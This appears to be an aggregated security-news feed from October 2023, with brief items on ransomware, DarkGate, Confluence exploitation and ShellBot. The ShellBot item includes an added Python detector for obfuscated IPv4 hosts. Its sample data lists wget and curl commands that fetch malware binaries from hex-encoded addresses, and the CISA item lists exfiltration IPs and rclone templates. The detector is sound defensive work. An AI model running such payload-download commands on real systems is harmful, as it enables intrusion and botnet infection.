            60% of companies are ‘very’ to ‘extremely’ concerned about ransomware attacks, according to the latest research from Hornetsecurity. Businesses acknowledge ransomware risk: Hornetsecurity revealed that 92.5% of businesses are aware of ransomware’s potential for negative impact. Still, just 54% of respondents said their leadership is ‘actively involved in conversations and decision-making’ around preventing such attacks. 39.7% said they were happy to ‘leave it to IT to deal with the issue’. “Our survey is a timely reminder that … More

            The post Stronger ransomware protection finally pays off appeared first on Help Net Security.

            "

            Autosummary: Effective security tools for ransomware defense The survey revealed the most used tools to combat potential threats: 87.8% used to end-point detection software with anti-ransomware capabilities 84.4% cited ’email filtration and threat analysis’ 22.4% mentioned ‘AI-enabled security solutions’ as a tool they are now using to combat ransomware within their organization. "


            After hackers distribute malware in game updates, Steam adds SMS-based security check for developers

            exploits
            2023-10-13 https://www.bitdefender.com/blog/hotforsecurity/after-hackers-distribute-malware-in-game-updates-steam-adds-sms-based-security-check-for-developers/
            Valve, the company behind the Steam video game platform, has announced a new security feature after multiple reports of game updates being poisoned with malware. But have they chosen the best way to protect developers' accounts? Read more in my article on the Hot for Security blog.

            Autosummary: In my opinion, Valve would have done better to have adopted a form of two-factor authentication which wasn't reliant on SMS messages, such as app-based TOTP (Time-based One-Time Passwords) authenticators, hardware security keys, or passkeys instead.


            DigiCert helps companies improve vulnerability management and cryptoagility strategies

            exploits
            2023-10-13 https://www.helpnetsecurity.com/2023/10/13/digicert-discovery/

            DigiCert announced its next generation Discovery, a set of key capabilities in DigiCert Trust Lifecycle Manager that enable customers to build a centralized book of record of their cryptographic keys and certificates. This centralized view, when coupled with management and automated provisioning and renewal, improves cryptoagility, reducing the time and resources needed to update algorithms, rotate keys and certificates and remediate threats. “The majority of organizations have not yet implemented a centralized crypto-management solution,” said … More

            The post DigiCert helps companies improve vulnerability management and cryptoagility strategies appeared first on Help Net Security.

            "

            Autosummary: "


            Ransomware attacks doubled year on year. Are organizations equipped to handle the evolution of Ransomware in 2023?

            exploits ransomware
            2023-10-13 https://thehackernews.com/2023/10/ransomware-attacks-doubled-year-on-year.html
            Ransomware attacks have only increased in sophistication and capabilities over the past year. From new evasion and anti-analysis techniques to stealthier variants coded in new languages, ransomware groups have adapted their tactics to bypass common defense strategies effectively. This article will cover just some of those new developments in Q3-2023 as well as give predictions on quarters to

            Autosummary: Q3-2023 witnessed a surge in attacks from newer groups such as Cactus, INC Ransom, Metaencryptor, ThreeAM, Knight Ransomware, Cyclop Group, and MedusaLocker, indicating that these groups, while not having the same profile and global presence as major players like LOCKBIT, remain potent threats. The recent patterns we have observed, however, showcase the growing popularity of Rust and GoLang amongst high-profile ransomware groups such as Hive, Agenda, Luna, and RansomExx. Increased adoption/use of Threat Intelligence Platforms: Due to their specific competency in this space, as well as their advanced AI and machine learning capabilities, organizations are increasingly using Threat Intelligence Platforms for their expertise, anomaly detection, and behavioral analysis to gain real-time threat intelligence to help mitigate ransomware attacks. Vision has the ability to scan your entire attack surface, extending to your vendors, partners, and third parties as well, giving you the ability to secure your entire supply chain and ecosystem from attacks. The Healthcare sector is particularly vulnerable to ransomware attacks as it has an extremely large attack surface spanning several websites, portals, billions of IoT medical devices, and a large network of supply chain partners and vendors.


            DarkGate Malware Spreading via Messaging Services Posing as PDF Files

            exploits
            2023-10-13 https://thehackernews.com/2023/10/darkgate-malware-spreading-via.html
            A piece of malware known as DarkGate has been observed being spread via instant messaging platforms such as Skype and Microsoft Teams. In these attacks, the messaging apps are used to deliver a Visual Basic for Applications (VBA) loader script that masquerades as a PDF document, which, when opened, triggers the download and execution of an AutoIt script designed to launch the malware. "It's

            Autosummary: "Cybercriminals can use these payloads to infect systems with various types of malware, including info stealers, ransomware, malicious and/or abused remote management tools, and cryptocurrency miners," the researchers said.


            FBI, CISA Warn of Rising AvosLocker Ransomware Attacks Against Critical Infrastructure

            exploits ransomware
            2023-10-13 https://thehackernews.com/2023/10/fbi-cisa-warn-of-rising-avoslocker.html
            The AvosLocker ransomware gang has been linked to attacks against critical infrastructure sectors in the U.S., with some of them detected as recently as May 2023. That's according to a new joint cybersecurity advisory released by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) detailing the ransomware-as-a-service (RaaS) operation's

            Autosummary: This includes adopting application controls, limiting the use of RDP and other remote desktop services, restricting PowerShell use, requiring phishing-resistant multi-factor authentication, segmenting networks, keeping all systems up-to-date, and maintaining periodic offline backups. "Instead of deploying malicious files on the victim device, encryption is done remotely, with the system process performing the encryption, which renders process-based remediation ineffective," Microsoft explained.


            FBI and CISA published a new advisory on AvosLocker ransomware

            exploits ransomware
            2023-10-13 https://securityaffairs.com/152427/uncategorized/avoslocker-ransomware-csa.html

            FBI and CISA published a joint Cybersecurity Advisory (CSA) to disseminate IOCs, TTPs, and detection methods associated with AvosLocker ransomware. The joint Cybersecurity Advisory (CSA) published by the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) provides known IOCs, TTPs, and detection methods associated with the AvosLocker ransomware variant employed […]

            The post FBI and CISA published a new advisory on AvosLocker ransomware appeared first on Security Affairs.

            "

            Autosummary: CISA and the FBI recommend to secure remote access tools by: Implementing application controls; Strictly limit the use of RDP and other remote desktop services; Disable command-line and scripting activities and permissions; Restrict the use of PowerShell; Update Windows PowerShell or PowerShell Core; Configure the Windows Registry to require User Account Control (UAC) approval for any PsExec operations. "


            CISA shares vulnerabilities, misconfigs used by ransomware gangs

            exploits ransomware
            2023-10-13 https://www.bleepingcomputer.com/news/security/cisa-shares-vulnerabilities-misconfigs-used-by-ransomware-gangs/
            The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has unveiled additional details regarding misconfigurations and security vulnerabilities exploited by ransomware gangs, aiming to help critical infrastructure organizations thwart their attacks. [...]


            New PEAPOD Cyberattack Campaign Targeting Women Political Leaders

            ciber
            2023-10-13 https://thehackernews.com/2023/10/new-peapod-cyberattack-campaign.html
            European Union military personnel and political leaders working on gender equality initiatives have emerged as the target of a new campaign that delivers an updated version of RomCom RAT called PEAPOD. Cybersecurity firm Trend Micro attributed the attacks to a threat actor it tracks under the name Void Rabisu, which is also known as Storm-0978, Tropical Scorpius, and UNC2596, and is also

            Autosummary: "Void Rabisu is one of the clearest examples where we see a mix of the typical tactics, techniques, and procedures (TTPs) used by cybercriminal threat actors and TTPs used by nation-state-sponsored threat actors motivated primarily by espionage goals," Trend Micro said.


            Stayin’ Alive campaign targets high-profile Asian government and telecom entities. Is it linked to ToddyCat APT?

            government Telcos
            2023-10-13 https://securityaffairs.com/152415/apt/stayin-alive-campaign-toddycat.html

            A cyberespionage campaign, tracked as Stayin’ Alive, targeted high-profile government and telecom entities in Asia. Cybersecurity company Check Point uncovered a malicious activity, tracked as Stayin’ Alive, that is targeting high-profile government and telecom entities in Asian countries, including Vietnam, Uzbekistan, Pakistan, and Kazakhstan. The campaign has been active since at least 2021, threat actors employed downloaders […]

            The post Stayin’ Alive campaign targets high-profile Asian government and telecom entities. Is it linked to ToddyCat APT? appeared first on Security Affairs.

            "

            Autosummary: Cybersecurity company Check Point uncovered a malicious activity, tracked as Stayin’ Alive, that is targeting high-profile government and telecom entities in Asian countries, including Vietnam, Uzbekistan, Pakistan, and Kazakhstan. Pierluigi Paganini October 13, 2023 October 13, 2023 A cyberespionage campaign, tracked as Stayin’ Alive, targeted high-profile government and telecom entities in Asia. "


            The Week in Ransomware - October 13th 2023 - Increasing Attacks

            exploits ransomware
            2023-10-13 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-13th-2023-increasing-attacks/
            Ransomware gangs continue to pummel the enterprise, with attacks causing disruption in business operations and resulting in data breaches if a ransom is not paid. [...]

            Autosummary: Contributors and those who provided new ransomware information and stories this week include: @fwosar, @demonslay335, @billtoulas, @Ionut_Ilascu, @serghei, @BleepinComputer, @malwrhunterteam, @Seifreed, @LawrenceAbrams, @SophosXOps, @3xp0rtblog, @AlvieriD, @pcrisk, @cyber_int, and @LikelyMalware.


            23andMe hit with lawsuits after hacker leaks stolen genetics data

            industry
            2023-10-13 https://www.bleepingcomputer.com/news/security/23andme-hit-with-lawsuits-after-hacker-leaks-stolen-genetics-data/
            Genetic testing provider 23andMe faces multiple class action lawsuits in the U.S. following a large-scale data breach that is believed to have impacted millions of its customers. [...]

            Autosummary: (Source: Santana v. 23andMe, Inc. complaint) The plaintiffs ask for various financial reliefs against 23andMe, including restitution, lifetime credit monitoring, actual, compensatory, and statutory damages and penalties, punitive damages, and coverage of attorney's fees.


            Microsoft addresses three zero-days for October’s Patch Tuesday

            exploits
            2023-10-13 https://www.computerworld.com/article/3708732/microsoft-addresses-three-zero-days-for-october-s-patch-tuesday.html#tk.rss_security
            "

            Autosummary: Windows This October, Microsoft released 13 critical updates and 68 patches rated as important to the Windows platform that cover the following key components: Windows Message Queuing Windows Win32K and Kernel Windows RDP, Layer 2 Tunnelling Protocol and Windows TCP/IP Windows Error Reporting Windows Common Log File System Driver Windows OLE, ODBC, and SQL Providers The key challenges relate to the critical updates to the Message Queuing feature in Windows. Each month, we break down the update cycle into product families (as defined by Microsoft) with the following basic groupings: Browsers (Microsoft IE and Edge) Microsoft Windows (both desktop and server) Microsoft Office Microsoft Exchange Server Microsoft Development platforms (NET Core, .NET Mitigations and workarounds Microsoft has published the following vulnerability related mitigations for this month"s Patch Tuesday release cycle: There are 15 Microsoft Message Queue updates this month, each with a published mitigation from Microsoft that notes, “if the Message Queuing service is enabled and listening on port 1801, then your system is vulnerable.”You can still generate RTF files using the Echo command in a DOS prompt, after setting the generator type, ANSI page, default language, character code, charset, and font. "


            Threat Actors Exploit Atlassian Confluence CVE-2023-22515 for Initial Access to Networks

            exploits
            2023-10-13 https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-289a

            SUMMARY

            The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint Cybersecurity Advisory (CSA) in response to the active exploitation of CVE-2023-22515. This recently disclosed vulnerability affects certain versions of Atlassian Confluence Data Center and Server, enabling malicious cyber threat actors to obtain initial access to Confluence instances by creating unauthorized Confluence administrator accounts. Threat actors exploited CVE-2023-22515 as a zero-day to obtain access to victim systems and continue active exploitation post-patch. Atlassian has rated this vulnerability as critical; CISA, FBI, and MS-ISAC expect widespread, continued exploitation due to ease of exploitation.

            CISA, FBI, and MS-ISAC strongly encourage network administrators to immediately apply the upgrades provided by Atlassian. CISA, FBI, and MS-ISAC also encourage organizations to hunt for malicious activity on their networks using the detection signatures and indicators of compromise (IOCs) in this CSA. If a potential compromise is detected, organizations should apply the incident response recommendations.

            For additional information on upgrade instructions, a complete list of affected product versions, and IOCs, see Atlassian’s security advisory for CVE-2023-22515.[1] While Atlassian’s advisory provides interim measures to temporarily mitigate known attack vectors, CISA, FBI, and MS-ISAC strongly encourage upgrading to a fixed version or taking servers offline to apply necessary updates.


            Autosummary: Example configuration file templates are listed in the following Figures 1 and 2, which are populated with the credentials of the exfiltration point:

            [s3]
            type =
            env_auth =
            access_key_id =
            secret_access_key =
            region =
            endpoint =
            location_constraint =
            acl =
            server_side_encryption =
            storage_class =

            [minio]
            type =
            provider =
            env_auth =
            access_key_id =
            secret_access_key =
            endpoint =
            acl =

            The following User-Agent strings were observed in request headers. Affected Confluence versions: 8.0.0, 8.0.1, 8.0.2, 8.0.3, 8.0.4, 8.1.0, 8.1.1, 8.1.3, 8.1.4, 8.2.0, 8.2.1, 8.2.2, 8.2.3, 8.3.0, 8.3.1, 8.3.2, 8.4.0, 8.4.1, 8.4.2, 8.5.0, 8.5.1. Unauthenticated remote threat actors can exploit this vulnerability to create unauthorized Confluence administrator accounts and access Confluence instances. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA, FBI, and MS-ISAC. The following IP addresses were obtained from FBI investigations as of October 2023 and observed conducting data exfiltration: 170.106.106[.]16, 43.130.1[.]222, 152.32.207[.]23, 199.19.110[.]14, 95.217.6[.]16 (Note: This is the official rclone.org website). Additional IP addresses observed sending related exploit traffic have been shared by Microsoft.[3] DETECTION METHODS: Network defenders are encouraged to review and deploy Proofpoint’s Emerging Threat signatures.


            ToddyCat hackers use "disposable" malware to target Asian telecoms

            exploits Telcos
            2023-10-12 https://www.bleepingcomputer.com/news/security/toddycat-hackers-use-disposable-malware-to-target-asian-telecoms/
            A newly discovered campaign dubbed "Stayin' Alive" has been targeting government organizations and telecommunication service providers across Asia since 2021, using a wide variety of "disposable" malware to evade detection. [...] "

            Autosummary: Check Point reports that "Stayin' Alive" uses various samples and variants of these loaders and payloads, often tailored to specific regional targets (language, filenames, themes). "


            Hyped up curl vulnerability falls short of expectations

            exploits
            2023-10-12 https://www.bleepingcomputer.com/news/security/hyped-up-curl-vulnerability-falls-short-of-expectations/
            curl 8.4.0 has been released to patch and publish details on a hyped-up high-severity security vulnerability (CVE-2023-38545), easing week-long concerns regarding the flaw's severity. [...] "

            Autosummary: "It requires the use of a socks5 proxy to be enabled by the curl user, this is actually quite common when people request APIs for security testing, debugging, or other technical work - it is also common when probing Tor services using tools like curl as it typically requires a socks5 proxy to perform the request," Hickey told BleepingComputer in a conversation.

            Not as bad as we feared: on Wednesday, Stenberg released curl 8.4.0 with fixes for two security vulnerabilities: a high-severity heap buffer overflow bug (CVE-2023-38545) and a low-severity cookie injection flaw (CVE-2023-38546). "


            Shadow PC warns of data breach as hacker tries to sell gamers' info

            financial
            2023-10-12 https://www.bleepingcomputer.com/news/security/shadow-pc-warns-of-data-breach-as-hacker-tries-to-sell-gamers-info/
            Shadow PC, a provider of high-end cloud computing services, is warning customers of a data breach that exposed customers' private information, as a threat actor claims to be selling the stolen data for over 500,000 customers. [...] "

            Autosummary: Shadow (Shadow) is a cloud gaming service providing users with high-end Windows PCs streamed to their local devices (PCs, laptops, smartphones, tablets, smart TVs), allowing them to run demanding AAA games on a virtual computer. "


            New Microsoft bug bounty program focuses on AI-powered Bing

            exploits
            2023-10-12 https://www.bleepingcomputer.com/news/security/new-microsoft-bug-bounty-program-focuses-on-ai-powered-bing/
            Microsoft announced a new AI bounty program focused on the AI-driven Bing experience, with rewards reaching $15,000. [...] "

            Autosummary: Bounty awards by vulnerability type, report quality and severity:

            Vulnerability type                   Report quality   Critical   Important   Moderate   Low
            Inference Manipulation               High             $15,000    $6,000      $0         $0
                                                 Medium           $10,000    $3,000      $0         $0
                                                 Low              $6,000     $2,000      $0         $0
            Model Manipulation                   High             $15,000    $6,000      $0         $0
                                                 Medium           $10,000    $3,000      $0         $0
                                                 Low              $6,000     $2,000      $0         $0
            Inferential Information Disclosure   High             $15,000    $6,000      $0         $0
                                                 Medium           $10,000    $3,000      $0         $0
                                                 Low              $6,000     $2,000      $0         $0

            Besides issues outlined in Microsoft's Vulnerability Severity Classification for AI Systems, researchers are also encouraged to report vulnerabilities that result in altering Bing's chat behavior across user boundaries, i.e., changing the AI in ways that could impact all other users. "


            Apple fixes iOS Kernel zero-day vulnerability on older iPhones

            exploits Linux
            2023-10-12 https://www.bleepingcomputer.com/news/security/apple-fixes-ios-kernel-zero-day-vulnerability-on-older-iphones/
            Apple has published security updates for older iPhones and iPads to backport patches released one week ago, addressing two zero-day vulnerabilities exploited in attacks. [...] "

            Autosummary: The list of devices impacted by the two zero-day bugs is extensive, and it includes:

            iPhone 8 and later
            iPad Pro (all models)
            iPad Air 3rd generation and later
            iPad 5th generation and later
            iPad mini 5th generation and later

            CISA added the two vulnerabilities [1, 2] to its Known Exploited Vulnerabilities Catalog last week, ordering federal agencies to secure their devices against incoming attacks. "


            Ransomware attacks now target unpatched WS_FTP servers

            exploits
            2023-10-12 https://www.bleepingcomputer.com/news/security/ransomware-attacks-now-target-unpatched-ws-ftp-servers/
            Internet-exposed WS_FTP servers unpatched against a maximum severity vulnerability are now targeted in ransomware attacks.  [...] "

            Autosummary: [Figure: Ransom letter dropped in WS_FTP attack (Sophos X-Ops)] Tracked as CVE-2023-40044, the flaw is caused by a .NET deserialization vulnerability in the Ad Hoc Transfer Module, enabling unauthenticated attackers to remotely execute commands on the underlying OS via HTTP requests. "


            TuxCare adds ESU service for stability and predictability in AlmaLinux systems

            Linux
            2023-10-12 https://www.helpnetsecurity.com/2023/10/12/tuxcare-esu-service/

            TuxCare has unveiled the addition of a new Extended Security Update (ESU) service for its Enterprise Support Service line up for AlmaLinux OS. The new ESU service enhances TuxCare’s comprehensive service portfolio for AlmaLinux OS, enabling organizations to achieve greater stability and predictability for their AlmaLinux systems. All services in the portfolio, including the newly announced ESU service as well as Essential Support, Live Patching, and Enhanced Support, are now offered to customers as a … More

            The post TuxCare adds ESU service for stability and predictability in AlmaLinux systems appeared first on Help Net Security.

            "

            Autosummary: "


            ShellBot Uses Hex IPs to Evade Detection in Attacks on Linux SSH Servers

            Linux
            2023-10-12 https://thehackernews.com/2023/10/shellbot-uses-hex-ips-to-evade.html
            The threat actors behind ShellBot are leveraging IP addresses transformed into hexadecimal notation to infiltrate poorly managed Linux SSH servers and deploy the DDoS malware. "The overall flow remains the same, but the download URL used by the threat actor to install ShellBot has changed from a regular IP address to a hexadecimal value," the AhnLab Security Emergency response Center (ASEC) "

            Autosummary: "
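            The trick works because wget, curl and most Linux tools hand the host part of a URL to the C library's inet_aton() parser, which accepts hexadecimal, octal, decimal-integer and short forms, none of which a blocklist keyed on dotted-decimal strings will match. The following is an added example, not code from the ASEC report or from ShellBot: it canonicalises such literals and flags download URLs whose host is written in a non-canonical form. It goes beyond the single-hex-integer case the report describes and handles the other inet_aton forms as well. The command lines are constructed and use the 203.0.113.0/24 documentation range rather than a real C2 address.

```python
"""
Added example; not code from the ASEC report or from ShellBot itself.
Canonicalises IPv4 literals written in the legacy forms that BSD inet_aton()
(and therefore wget, curl and most Linux downloaders) accepts, so a URL such as
http://0xCB007107/... can be matched against ordinary dotted-decimal blocklists.
Handles single hex/decimal/octal integers, dotted hex/octal, and short
(1-3 component) forms. Sample commands are constructed.
"""
import re
from typing import List, Optional, Tuple

URL_HOST_RE = re.compile(r"(?:https?|ftp)://([^/\s:@]+)")


def _component_to_int(part: str) -> int:
    """Parse one dotted component with C-style radix rules: 0x.. hex, leading-0 octal, else decimal."""
    if re.fullmatch(r"0[xX][0-9a-fA-F]+", part):
        return int(part[2:], 16)
    if re.fullmatch(r"0[0-7]+", part):
        return int(part, 8)
    if re.fullmatch(r"[0-9]+", part):
        return int(part, 10)
    raise ValueError(f"not a numeric component: {part!r}")


def normalize_ipv4_literal(host: str) -> Optional[str]:
    """Return the dotted-decimal form of an inet_aton-style IPv4 literal, or None if host is not one."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        nums = [_component_to_int(p) for p in parts]
    except ValueError:
        return None
    # inet_aton semantics: every component except the last must fit in one byte;
    # the last one fills all remaining bytes, so "203.0x7107" is 203.0.113.7.
    head, last = nums[:-1], nums[-1]
    if any(n > 0xFF for n in head):
        return None
    if last >= 1 << (8 * (4 - len(head))):
        return None
    value = last
    for i, n in enumerate(head):
        value |= n << (8 * (3 - i))
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def find_obfuscated_download_hosts(lines) -> List[Tuple[str, str]]:
    """Return (raw_host, dotted_decimal) for every URL whose host is a non-canonical IPv4 literal."""
    hits = []
    for line in lines:
        for raw in URL_HOST_RE.findall(line):
            canonical = normalize_ipv4_literal(raw)
            if canonical is not None and canonical != raw:
                hits.append((raw, canonical))
    return hits


# Constructed command lines of the kind a bot installer runs after SSH login.
SAMPLE_COMMANDS = [
    "wget http://0xCB007107/bins/x86 -O /tmp/x86",      # single hex integer (the ShellBot case)
    "curl -O http://0xcb.0x0.0x71.0x7/perl.tar.gz",      # dotted hex
    "wget http://3405803783/sh",                         # single decimal integer
    "curl http://0313.0.0161.07/update",                 # dotted octal
    "wget http://203.0x7107/x",                          # short form: last component spans 3 bytes
    "wget http://203.0.113.7/legit.sh",                  # canonical form: not reported
    "curl http://example.invalid/update",                # hostname: not reported
]

if __name__ == "__main__":
    for raw, canonical in find_obfuscated_download_hosts(SAMPLE_COMMANDS):
        print(f"{raw:>22} -> {canonical}")
```

            Run normalize_ipv4_literal() over URL hosts before any blocklist or threat-intel comparison, and treat a non-canonical literal in a download command as a signal in its own right: there is no legitimate reason for an installer script to spell an address as 0xCB007107.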


            Microsoft Defender Thwarts Large-Scale Akira Ransomware Attack

            exploits ransomware
            2023-10-12 https://thehackernews.com/2023/10/microsoft-defender-thwarts-akira.html
            Microsoft on Wednesday said that a user containment feature in Microsoft Defender for Endpoint helped thwart a "large-scale remote encryption attempt" made by Akira ransomware actors targeting an unknown industrial organization in early June 2023. The tech giant's threat intelligence team is tracking the operator as Storm-1567. The attack leveraged devices that were not onboarded to Microsoft "

            Autosummary: "


            Researchers Uncover Malware Posing as WordPress Caching Plugin

            exploits
            2023-10-12 https://thehackernews.com/2023/10/researchers-uncover-malware-posing-as.html
            Cybersecurity researchers have shed light on a new sophisticated strain of malware that masquerades as a WordPress plugin to stealthily create administrator accounts and remotely control a compromised site. "Complete with a professional looking opening comment implying it is a caching plugin, this rogue code contains numerous functions, adds filters to prevent itself from being included in the list "

            Autosummary: "


            Researchers Uncover Ongoing Attacks Targeting Asian Governments and Telecom Giants

            government Telcos
            2023-10-12 https://thehackernews.com/2023/10/researchers-uncover-ongoing.html
            High-profile government and telecom entities in Asia have been targeted as part of an ongoing campaign since 2021 that's designed to deploy basic backdoors and loaders for delivering next-stage malware. Cybersecurity company Check Point is tracking the activity under the name Stayin' Alive. Targets include organizations located in Vietnam, Uzbekistan, Pakistan, and Kazakhstan. "The simplistic "

            Autosummary: A closer examination of the command-and-control (C2) infrastructure has revealed a constantly evolving arsenal of loader variants dubbed CurLu, CurCore, and CurLog that are capable of receiving DLL files, executing remote commands, and launching a process associated with a newly generated file to which data from the server is written. "


            Phishing, the campaigns that are targeting Italy

            financial
            2023-10-12 https://securityaffairs.com/152372/cyber-crime/phishing-campaigns-targt-italy.html

            This post analyzed the numerous phishing campaigns targeting users and organizations in Italy. Phishing is a ploy to trick users into revealing personal or financial information through an e-mail, Web site, and even through instant messaging. Particularly popular is so-called brand phishing, which occurs when criminals impersonate the official website of a well-known brand […]

            The post Phishing, the campaigns that are targeting Italy appeared first on Security Affairs.

            "

            Autosummary: The phenomenon in numbers: numerous reports from the Italian Postal Police (https://www.commissariatodips.it/index.html) confirm CERT-AgID’s weekly data (https://cert-agid.gov.it/category/news/) on phishing campaigns involving dozens of exploited brands, including Poste Italiane, Intesa Sanpaolo, Nexi, Inps, Agenzia delle Entrate and Zimbra. In this case, one must act immediately, without panic or fear:

            Immediately change the password of the targeted service;
            Activate two-factor authentication, if you have not already done so;
            Contact the targeted organisation and the police. "


            FBI shares AvosLocker ransomware technical details, defense tips

            exploits ransomware
            2023-10-12 https://www.bleepingcomputer.com/news/security/fbi-shares-avoslocker-ransomware-technical-details-defense-tips/
            The U.S. government has updated the list of tools AvosLocker ransomware affiliates use in attacks to include open-source utilities along with custom PowerShell and batch scripts. [...] "

            Autosummary: In the updated advisory, the agencies share the following tools as being part of the arsenal of AvosLocker ransomware affiliates:

            Remote administration tools for backdoor access: Splashtop Streamer, Tactical RMM, PuTTy, AnyDesk, PDQ Deploy, Atera Agent
            Open-source network tunneling utilities: Ligolo, Chisel
            Adversary emulation frameworks for command and control: Cobalt Strike and Sliver
            Credential harvesting: Lazagne and Mimikatz
            Data exfiltration: FileZilla and Rclone

            Additional publicly available tools observed in AvosLocker attacks include Notepad++, RDP Scanner, and 7zip. "


            Ransomlooker, a new tool to track and analyze ransomware groups’ activities

            exploits ransomware
            2023-10-12 https://securityaffairs.com/152416/malware/ransomlooker-tool.html

            Ransomlooker monitors ransomware groups’ extortion sites and delivers consolidated feeds of their claims worldwide. Cybernews presented Ransomlooker, a tool that monitors ransomware groups’ extortion sites and delivers consolidated feeds of their claims worldwide. The researchers created the tool to help cybersecurity experts in their daily jobs by providing real-time updates and actionable insights. It offers various […]

            The post Ransomlooker, a new tool to track and analyze ransomware groups’ activities appeared first on Security Affairs.

            "

            Autosummary: "


            Update now! Atlassian Confluence vulnerability is being actively exploited

            exploits
            2023-10-12 https://www.malwarebytes.com/blog/news/2023/10/atlassian-confluence-zero-day

            Categories: Exploits and vulnerabilities

            Categories: News

            Microsoft Threat Intelligence has revealed that it has been tracking the active exploitation of a vulnerability in Atlassian Confluence software since September 14, 2023.

            (Read more...)

            The post Update now! Atlassian Confluence vulnerability is being actively exploited appeared first on Malwarebytes Labs.

            "

            Autosummary: On the same day, Microsoft Threat Intelligence took to X (formerly Twitter), to say that a nation-state actor, codenamed Storm-0062, which it believes to be a nation-state actor working on behalf of China, had been exploiting CVE-2023-22515 since mid-September. "


            Giant health insurer struck by ransomware didn't have antivirus protection

            exploits ransomware
            2023-10-12 https://www.malwarebytes.com/blog/news/2023/10/health-insurer-left-defenceless-against-ransomware-attack

            Categories: News

            Categories: Ransomware

            The Philippine Health Insurance Corporation (PhilHealth), has confirmed that it was unprotected by antivirus software when it was attacked by the Medusa ransomware group in September.

            (Read more...)

            The post Giant health insurer struck by ransomware didn't have antivirus protection appeared first on Malwarebytes Labs.

            "

            Autosummary: In response, PhilHealth "strongly recommends changing passwords of online accounts, enabling multi-factor authentication, monitoring of suspicious activities in their online accounts, not opening and clicking suspicious emails and links, and not answering suspicious calls and text messages." The attack is a great example of how ransomware attacks aren't really about computers, they are about the effects they have on people. According to a recent post on its Facebook account, all of the corporation's public-facing applications have been back online since October 6, 2023, including "the website, Member Portal, eClaims for electronic submission of hospital claims, and EPRS for employer remittances." As the attack on Ireland's Health Service Executive in 2021 showed, attacks on healthcare can create uncertainty, delays, enormous stress and legal jeopardy for staff, and the very real risk of pain, physical harm and even death for patients. "


            FTX thief cashes out millions during Bankman-Fried trial

            financial
            2023-10-12 https://www.bbc.co.uk/news/technology-67090501?at_medium=RSS&at_campaign=KARANGA
            Chunks of the stolen $470m in cryptocurrency have been laundered every day since the trial began. "

            Autosummary: "


            Simpson Manufacturing shuts down IT systems after cyberattack

            industry ciber
            2023-10-11 https://www.bleepingcomputer.com/news/security/simpson-manufacturing-shuts-down-it-systems-after-cyberattack/
            Simpson Manufacturing disclosed via an SEC 8-K filing a cybersecurity incident that has caused disruptions in its operations, which are expected to continue. [...] "

            Autosummary: "On October 10, 2023, Simpson Manufacturing Co., Inc. experienced disruptions in its Information Technology (IT) infrastructure and applications resulting from a cybersecurity incident," reads the statement. "


            Microsoft: State hackers exploiting Confluence zero-day since September

            exploits government
            2023-10-11 https://www.bleepingcomputer.com/news/security/microsoft-state-hackers-exploiting-confluence-zero-day-since-september/
            Microsoft says a Chinese-backed threat group tracked as "Storm-0062" (aka DarkShadow or Oro0lxy) has been exploiting a critical privilege escalation zero-day in the Atlassian Confluence Data Center and Server since September 14, 2023. [...] "

            Autosummary: Storm-0062 is a state hacking group linked to China's Ministry of State Security and known for targeting software, engineering, medical research, government, defense, and tech firms in the U.S., U.K., Australia, and various European countries to collect intelligence. "


            Ransomware review: October 2023

            exploits
            2023-10-11 https://www.malwarebytes.com/blog/threat-intelligence/2023/10/ransomware-review-october-2023

            Categories: Threat Intelligence

            In September, two high-profile casino breaches taught us about the nuances of the RaaS affiliate landscape, the asymmetric dangers of phishing, and of two starkly different approaches to ransomware negotiation.

            (Read more...)

            The post Ransomware review: October 2023 appeared first on Malwarebytes Labs.

            "

            Autosummary: [Figures: Known ransomware attacks by gang, September 2023; Known ransomware attacks by country, September 2023; Known ransomware attacks by industry sector, September 2023] Last month’s two high-profile casino breaches were an interesting case study in the nuances of the RaaS affiliate landscape, the asymmetric dangers of phishing, and of two starkly different approaches to ransomware negotiation. Scattered Spider, on the contrary, highlights the peril posed when ready-made RaaS software merges with seasoned experience: in both of their casino breaches, the group employed advanced tactics, techniques, and procedures (TTPs), including in-depth reconnaissance, social engineering, and advanced lateral movement techniques. Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. "


            CISA catalog passes 1,000 known-to-be-exploited vulnerabilities. Celebration time, or is it?

            exploits
            2023-10-11 https://www.malwarebytes.com/blog/news/2023/10/cisa-catalog-passed-1000-known-to-be-exploited-vulnerabilities-celebration-time-or-is-it

            Categories: Exploits and vulnerabilities

            Categories: News

            Tags: CISA

            Tags: KEV

            Tags: catalog

            Tags: vulnerabilities

            Tags: prioritize

            The CISA Known Exploited Vulnerabilities catalog has grown to cover more than 1,000 vulnerabilities since its launch in November 2021.

            (Read more...)

            The post CISA catalog passes 1,000 known-to-be-exploited vulnerabilities. Celebration time, or is it? appeared first on Malwarebytes Labs.

            "

            Autosummary: It's hard to find metrics to show what the effect of the KEV catalog is on malware infections and ransomware attacks, but what is clear is that the mean time to remediate listed vulnerabilities was an average of nine days faster than for non-listed ones, and 36 days faster for internet-facing vulnerabilities. On September 18, 2023, the Cybersecurity & Infrastructure Security Agency (CISA) announced that its Known Exploited Vulnerabilities (KEV) catalog has reached the milestone of covering more than 1,000 vulnerabilities since its launch in November 2021. "


            Securing the future of Industry 4.0: WALLIX white paper reveals key strategies – get your copy today!

            industry
            2023-10-11 https://grahamcluley.com/feed-sponsor-wallix/
            Graham Cluley Security News is sponsored this week by the folks at WALLIX. Thanks to the great team there for their support! In the rapidly evolving landscape of Industry 4.0, marked by rapid innovation and unparalleled connectivity, safeguarding your critical assets is non-negotiable. As industries like Manufacturing, Utilities, Energy, and Transportation undergo profound digital transformations, … Continue reading "Securing the future of Industry 4.0: WALLIX white paper reveals key strategies – get your copy today!" "

            Autosummary: "


            CISA Warns of Actively Exploited Adobe Acrobat Reader Vulnerability

            exploits
